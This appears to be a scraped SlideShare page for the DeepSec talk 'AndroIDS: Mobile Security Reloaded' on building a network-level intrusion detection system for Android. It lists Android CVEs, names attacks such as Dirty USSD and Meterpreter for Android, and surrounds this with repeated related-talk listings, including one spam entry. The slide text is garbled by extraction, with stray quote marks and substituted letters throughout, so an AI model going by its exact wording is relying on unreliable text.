Zimperium - Technology BriefingJake Leonard
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumZimperium
 
Technology Report
Technology ReportTechnology Report
Technology ReportMarq2014
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For HealthcareNicholas Davis
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile appsStanfy
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android Suraj Ligade
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
SMART PHONE
SMART PHONE SMART PHONE
SMART PHONE kaushalDesai22
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Dr David Probert
 

Contenu connexe

En vedette

Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyJaime Sánchez
 
Mobile security
Mobile securityMobile security
Mobile securityhome
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจicesmurf
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBMerlin Govender
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumZimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Serviceguest536dd0e
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceZimperium
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...CA API Management
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
Zimperium - Technology BriefingJake Leonard
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumZimperium
 
Technology Report
Technology ReportTechnology Report
Technology ReportMarq2014
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For HealthcareNicholas Davis
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile appsStanfy
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android Suraj Ligade
 

En vedette (16)

Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of Privacy
 
Mobile security
Mobile securityMobile security
Mobile security
 
Mobile security
Mobile securityMobile security
Mobile security
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจ
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEB
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Service
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat Intelligence
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
Zimperium - Technology Briefing
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by Zimperium
 
Technology Report
Technology ReportTechnology Report
Technology Report
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For Healthcare
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile apps
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android
 

Similaire à AndroIDS: Mobile Security Reloaded

Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Dr David Probert
 
Secure Messenger
Secure MessengerSecure Messenger
Secure MessengerInnovecs
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Subho Halder
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)Justin Hoang
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gearshawn_merdinger
 
New trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesNew trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesEveryware Technologies
 
AITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityAITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityJohn D. Johnson
 
Securing Internet of Things
Securing Internet of Things Securing Internet of Things
Securing Internet of Things Swapnil Deshmukh
 
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeThe Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeDavide Gomba
 
Android Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinAndroid Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinJames Montemagno
 
Mobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaMobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaGarvit Arya
 
Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Filip Maertens
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesÖmer Coşkun
 

Similaire à AndroIDS: Mobile Security Reloaded (20)

Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS X
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
Mobile security
Mobile securityMobile security
Mobile security
 
SMART PHONE
SMART PHONE SMART PHONE
SMART PHONE
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
 
Secure Messenger
Secure MessengerSecure Messenger
Secure Messenger
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gear
 
New trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesNew trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devices
 
AITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityAITP Presentation on Mobile Security
AITP Presentation on Mobile Security
 
Securing Internet of Things
Securing Internet of Things Securing Internet of Things
Securing Internet of Things
 
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeThe Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
 
Android Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinAndroid Wear Applications in C# with Xamarin
Android Wear Applications in C# with Xamarin
 
Mobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaMobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit Arya
 
Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011
 
Anti virus
Anti virusAnti virus
Anti virus
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic Techniques
 

Plus de Jaime Sánchez

La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...Jaime Sánchez
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Jaime Sánchez
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPJaime Sánchez
 

Plus de Jaime Sánchez (6)

La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IP
 

Dernier

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 

Dernier (20)

Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 

AndroIDS: Mobile Security Reloaded

  • 2. ANDROIDS: MOBILE SECURITY RELOADED $"WHO"I"AM !"Passionate"about"computer"security. !"Computer"Engineering"degree"and"an"Execu7ve" MBA." !"I’m"from"Spain;"We’re"sexy"and"you"know"it. !"You"can"follow" my"adventures" at"@segofensiva" or"in"my"blog"h?p://www.seguridadofensiva.com !""Other"conferences: !"RootedCON"in"Spain !"Nuit"Du"Hack"in"Paris" !"Black"Hat"Arsenal"in"USA !"Defcon"in"USA !"... JAIME SÁNCHEZ (@SEGOFENSIVA) 2 DEEPSEC
  • 3. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MOTIVATIONS !" Smartphones" have" evolved" into" sophisGcated," compact"minicomputers !"Stores"sensiGve/private"informaGon"and"services !"Smartphones"usage"is"on"the"raise" !"SuscepGble"to"various"PCKlike"types"of"aLacks !" The" importance" of" security" mechanisms" is" not" yet"understood !"Security"mechanisms"are"not"sufficient !"Variety"of"plaOorms JAIME SÁNCHEZ (@SEGOFENSIVA) 3 DEFCON 21 DEEPSEC
  • 4. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED WHY"ANDROID? !"Being"popular"is"not"always"a"good"thing. !"Mobile"malware"and"threats"are"clearly"on"the"rise. !"Over" 100" million"Android"phones" shipped"in"the"second"quarter" of"2012" alone. !""Targets"this"large"are"difficult"for"a?ackers"to"resist!" JAIME SÁNCHEZ (@SEGOFENSIVA) 4 DEFCON 21 DEEPSEC
  • 5. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED THE"PLATFORM !" Android" has" inherited" powerful" base"systems"from"Linux"Kernel"such" as" the" memory" management," mulGtasking"and"file"management. !" Android" is" a" plaOorm" which" embraces" numerous" technologies" like" Linux" Kernel," C++," Java," Dalvik" VM,"etc. !" Android" has" a" processRunit" component" model" and" provides" system" func7ons" as" server" processes." For" a" funcGonal" meshKup" of" processes," it" provides"Binder. !"Why"has"a"new"mechanism"been"developed,"rather"than"using"(IPC),"such" as"sockets"and"pipes"provided"by"Linux?"It"is"because"of"performance. JAIME SÁNCHEZ (@SEGOFENSIVA) 5 DEFCON 21 DEEPSEC
  • 6. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SECURITY"ARCHITECTURE !" Android" seeks" to" be" the" most" secure" and" usable" operaGng" system" for" mobile" plaOorms" by" reKpurposing" tradiGonal" operaGng" system" security" controls"to: !"Protect"user"data !"Protect"system"resources"(including"the"network) !"Provide"applicaGon"isolaGon !"To"achieve"these"objecGves,"Android"provides"these"key"security"features: !"Robust"security"at"the"OS"level"through"the"Linux"kernel !"Mandatory"applicaGon"sandbox"for"all"applicaGons !"Secure"interprocess"communicaGon !"ApplicaGon"signing !"ApplicaGonKdefined"and"userKgranted"permissions !" Each" component" assumes" that" the" components" below" are" properly" secured. JAIME SÁNCHEZ (@SEGOFENSIVA) 6 DEFCON 21 DEEPSEC
  • 7. THE"PROBLEM"? There is a massive growth in the volume of malware families and samples ... Google"Play’s"track"record"with"malware"is"not"too" good"(Bouncer"can"be"compromised)"...
  • 9. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android v1.0 CVE-2009-0475 (Remote code execution) CVE-2009-0606 (Privilege Escalation) CVE-2009-0607 (Multiple Integer Overflows) CVE-2009-0608 (Integer Overflow) CVE-2009-1895 (Privilege Escalation) CVE-2009-1754 (Access to Sensitive Information) CVE-2009-2348 (Access to Camera and Record Audio) CVE-2009-2656 (DoS through SMS) CVE-2009-2999 (DoS through SMS) CVE-2009-3698 (DoS through Dalvik API) CVE-2009-1185 (Privilege Escalation) CVE-2009-1186 (DoS through udev) Android v2.0 CVE-2009-1442 (Code Execution) CVE-2010-EASY (Privilege Escalation) CVE-2009-2692 (Privilege Escalation) CVE-2010-1807 (WebKitPrivilege Escalation) CVE-2010-1119 (WebKit Privilege Escalation) CVE-2011-1149 (Privilege Escalation) CVE-2011-3975 (Access to Sensitive Information) CVE-2011-2357 (Cross-Application Scripting) CVE-2011-0680 (Access to Sensitive Information) CVE-2011-2344 (Gain Privileges and Access Pictures) CVE-2011-1823 (Code Execution) JAIME SÁNCHEZ (@SEGOFENSIVA) Android v3.0 CVE-2010-4804 (Information Disclosure) CVE-2011-1823 (Privilege Escalation) CVE-2011-0640 (Code Execution) CVE-2011-1349 (DoS) CVE-2011-1350 (Privilege Escalation) CVE-2011-1352 (Privilege Escalation) CVE-2011-2343 (Access to Sensitive Information) CVE-2011-3874 (Privilege Escalation) CVE-2011-2357 (Bypass Permissions) 9 DEFCON 21 DEEPSEC
  • 10. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED DIRTY"USSD Poor"SSL/TLS"implementaGons" KernelKmode"driver"exploits NFC"VulnerabiliGes Android"Master"Key ... !!!"METERPRETER"FOR" ANDROID"!!! JAIME SÁNCHEZ (@SEGOFENSIVA) 10 DEFCON 21 DEEPSEC
  • 11. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Mobile"Pwn2Own"2013 !" One" exploit" took"advantage" of" two" Chrome"on"Nexus"4"vulnerabiliGes"–" an" integer" overflow"that"affects" Chrome"and"another"Chrome" vulnerability"that"resulted"in"a"full" sandbox"escape"and"the"possibility"of"remote"code"execuGon"on"the"affected"device. !"Two"exploits"compromised"apps"that"are"installed"on"all"Samsung"Galaxy"S4"devices. JAIME SÁNCHEZ (@SEGOFENSIVA) 11 DEFCON 21 DEEPSEC
